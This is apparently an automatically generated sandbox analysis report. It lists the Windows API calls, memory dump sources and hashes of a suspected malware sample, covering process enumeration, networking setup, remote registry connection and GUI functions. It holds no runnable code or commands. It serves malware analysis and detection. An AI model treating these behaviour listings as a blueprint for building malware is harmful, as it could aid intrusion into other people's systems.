                                                                                                                                                                            • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                                                                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                                                                                                                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00436FA0
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436FB2
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436FC4
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2903788889-0
                                                                                                                                                                            • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                                                                            • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                                                                                                                            • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                                                                            • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00441585
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                            • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                            • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                                                                            • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                            • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00401257
                                                                                                                                                                              • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                                                                              • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                              • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                              • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                            • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1792922140-0
                                                                                                                                                                            • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                                                                            • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                                                                            • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1925773019-0
                                                                                                                                                                            • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                            • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                                                                            • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                            • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                                                                            • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                                                                            • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                                                                            • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                                                                            • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                                                                            • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                                                                            • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                                                                            • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                            • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                            • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                                                                            • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                            • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                                                                            APIs
                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                            • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                                                                            • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                                                                            • _memset.LIBCMT ref: 00464B92
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3424476444-0
                                                                                                                                                                            • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                            • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                            • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                                                            • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                            • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                                                                            • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 535477410-0
                                                                                                                                                                            • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                            • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                                                                            • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                            • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                            • _memset.LIBCMT ref: 004538C4
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00453960
                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3530711334-4108050209
                                                                                                                                                                            • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                                                                            • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                                                                            • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                                                                            • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 3488606520-2761332787
                                                                                                                                                                            • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                            • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                            • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                            • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                            • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                            • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                            • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                            • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                                                                            • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                            • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
